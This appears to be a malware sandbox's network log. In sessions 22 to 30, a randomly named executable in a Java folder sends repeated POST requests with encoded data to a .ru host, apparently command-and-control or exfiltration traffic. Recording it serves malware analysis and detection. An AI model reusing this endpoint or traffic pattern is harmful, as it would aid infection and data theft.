                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:26.821665049 CET | 1072 | OUT | Data Raw: 55 56 5d 53 5f 5d 51 55 55 5a 54 59 51 5e 55 53 58 5a 5c 58 59 5c 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UV]S_]QUUZTYQ^USXZ\XY\RY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?5#"%>6)+Z$-$^03?#^--8(.*#^!'^)3
Jan 1, 2025 15:02:26.923563004 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:27.195652008 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oqcYYKnjRWit4%2BdLN%2BcAeexkur7iY%2BDsDNWkcNLuVPPj0zv8Wwk2ceiLFLv1fH7sN1CXcIT6PnwfPDScZNESPhaHjI9V2qnsSmX4AEeUM5ddUpIAthVwxqmaQPNpQUEU8%2BjEHQM7"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c0dffcb41c6-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4666&min_rtt=2546&rtt_var=5196&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=74829&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:27.348082066 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:27.696805954 CET | 1072 | OUT | Data Raw: 50 53 58 51 5a 57 54 5f 55 5a 54 59 51 5a 55 52 58 5f 5c 5a 59 50 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXQZWT_UZTYQZURX_\ZYPRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ])?-Y#(9^1>!\>=<$'-9'8$Y-',$/(?3*<#^!'^)#
Jan 1, 2025 15:02:27.806298971 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:28.072681904 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVdarj2BmM9S1O6GoINJMceljo8ruEh1Eg1EUyUOxjTy8InD%2F2be6Tjsb72sCh3oN58SF8FXrA0PCjEHGwBxeFs8vnUpkhXqBSYxPv%2BELJhQXnH%2FGcKjDfd62HPnObMoklBreC2E"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c137b740f4a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4730&min_rtt=1599&rtt_var=6862&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=54782&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49764 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:28.200762033 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:28.556112051 CET | 1072 | OUT | Data Raw: 50 56 58 50 5a 5f 51 54 55 5a 54 59 51 5c 55 51 58 59 5c 5a 59 51 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXPZ_QTUZTYQ\UQXY\ZYQR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^),>7;%%-!)=?_0:B$\3$(/4=>><#^!'^)
Jan 1, 2025 15:02:28.643827915 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:28.899789095 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3CZAKEvr6TEpMobXn4AH47y2NkMN8k0S8JG3Jtl62t8Qd7bUSLSPvIebIwnhKmnc91as1q70vVVcl8UeLlg%2Fkowvmd43d2277MOymW%2BvBOAWL2yOH9r9IgjIGwRym2XfKEG3fiL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c18bc2ac3f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1468&rtt_var=1569&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=263442&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49765 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:29.040119886 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:29.384826899 CET | 1072 | OUT | Data Raw: 50 56 58 52 5a 5c 54 5a 55 5a 54 59 51 5e 55 56 58 52 5c 5a 59 57 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXRZ\TZUZTYQ^UVXR\ZYWRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^(?>4+-&>Z>X<$$=943!$+Y8.+7=,#^!'^)3
Jan 1, 2025 15:02:29.486393929 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49766 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:29.546731949 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1784
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:29.901791096 CET | 1784 | OUT | Data Raw: 55 55 5d 54 5a 5d 54 5a 55 5a 54 59 51 5b 55 57 58 53 5c 5e 59 50 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]TZ]TZUZTYQ[UWXS\^YPRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#??)#226(=<'4.'?.P',+^/\=>>#^!'^)/
Jan 1, 2025 15:02:29.988141060 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:30.290890932 CET | 962 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BcaFjo%2FLBqAmVndaFjGwv8v%2BSPdwWwCJmmx%2FkMFifQfJdXuJdOE501KIR%2BeRrSF%2BSSuRYlPLte1Fa88%2F05etIZtoU199pJKIRg07PdYpjGerZyYJZDE9UQXfT4pMPn5e13Ednwd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c212ce8426d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2596&min_rtt=2010&rtt_var=1927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2128&delivery_rate=217812&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 08 30 38 28 01 28 58 2a 1e 2f 2c 34 0f 31 2f 08 59 27 1e 30 13 32 3e 18 07 2f 2b 30 11 28 15 0d 5b 32 14 3d 5e 34 31 0f 04 26 36 2e 5d 04 1d 26 04 3d 2a 36 5e 3f 3c 26 02 2a 1c 24 5e 33 09 2b 5a 24 37 30 11 27 3e 25 02 22 1c 3f 1f 27 30 20 57 3c 3a 23 12 24 04 32 57 34 2a 2e 57 0d 12 22 1d 25 00 39 1f 29 08 3f 0a 21 5a 38 0b 25 2f 2b 56 27 12 3b 09 34 3b 35 0a 29 11 2c 59 35 19 0f 55 30 39 3c 01 21 00 31 59 21 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!08((X*/,41/Y'02>/+0([2=^41&6.]&=*6^?<&*$^3+Z$70'>%"?'0 W<:#$2W4*.W"%9)?!Z8%/+V';4;5),Y5U09<!1Y!"T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49767 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:29.669495106 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:30.024802923 CET | 1072 | OUT | Data Raw: 50 53 58 50 5f 59 54 5a 55 5a 54 59 51 52 55 56 58 53 5c 55 59 55 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXP_YTZUZTYQRUVXS\UYUR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+<1]4%[1>>4&'2-40?1$??^8.<-<V*,#^!'^)
Jan 1, 2025 15:02:30.124504089 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:30.388788939 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yw9dLClXNBupdXk6cDJ65Pp2s6Sj0b2Sftku0Ng97ztuNBv%2F20V88BCYyEmyWaMLw%2FaK%2FhMylVZKUY4lg04nwShU4HSA1eyQQMxGea3CAANhPiMsUtpPOds5XzBUDlmQRWtJKoI2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c21f92643f7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4339&min_rtt=1847&rtt_var=5678&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=67009&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49768 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:30.514766932 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:02:30.868555069 CET | 1072 | OUT | Data Raw: 55 57 58 51 5a 59 54 5e 55 5a 54 59 51 52 55 50 58 59 5c 5e 59 53 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXQZYT^UZTYQRUPXY\^YSR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <-#+"&>:(>0$2-' $.Q$'X-=??$U)<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:30.960504055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:31.135643005 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKY87y9ijW79UPCNBuTFI3V2Hves%2FnM3184MM9LIKCGNOqArZIl058DeQi8qJ47Im%2B3XckH1iVbzPG8OjX45P%2F04VX4QC6ET9W3dGx%2FAWHGWBivWB6tbZPeono49Su4cmr3JyaCt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c273f681895-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1508&rtt_var=618&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=849825&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  28 | 192.168.2.4 | 49769 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:31.266402960 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:31.618678093 CET | 1072 | OUT | Data Raw: 50 55 5d 51 5f 59 54 59 55 5a 54 59 51 59 55 56 58 5c 5c 5e 59 51 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]Q_YTYUZTYQYUVX\\^YQR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?1[7;%_&>>>?Y34:V:$%<"',=4]<= U*#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:31.739553928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:32.011548042 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4yN48XvALbfU7qpFpSOysNIyv45nCTzrVnQz%2BLtUCDLEgjPKIcxF6HDkd2%2Fe216wC1jvCYY9pnNoHZFJHWUGthr49qB%2FJHwlqsEzOqC0BLe1zUykPgjkcnQ%2B5uMFvvp8Ocq7kbKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c2c08d4726f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8078&min_rtt=2024&rtt_var=12868&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=28933&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  29 | 192.168.2.4 | 49770 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:32.143732071 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:32.493655920 CET | 1072 | OUT | Data Raw: 55 57 58 5c 5a 5a 51 5a 55 5a 54 59 51 5d 55 55 58 5a 5c 5c 59 55 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWX\ZZQZUZTYQ]UUXZ\\YUR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (,* 2&X5>Z0B9:$X0?W0Z,,;<*#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:32.591629982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:32.848536015 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skM0f1boFUlui2%2BLAlR95aMTxdGZOOk3lYojijnvbZAAg5egcnEorJc0HuPDj5n98BYntEwQzv6kLCdyh%2BXdOlC4rdbrp%2FDDD%2BjrD42iWWeLOi0d9RzQDMZ1J%2FbMMpoXfvB0N31l"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c316d657cee-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8203&min_rtt=1911&rtt_var=13300&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=27944&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  30 | 192.168.2.4 | 49771 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:32.984209061 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
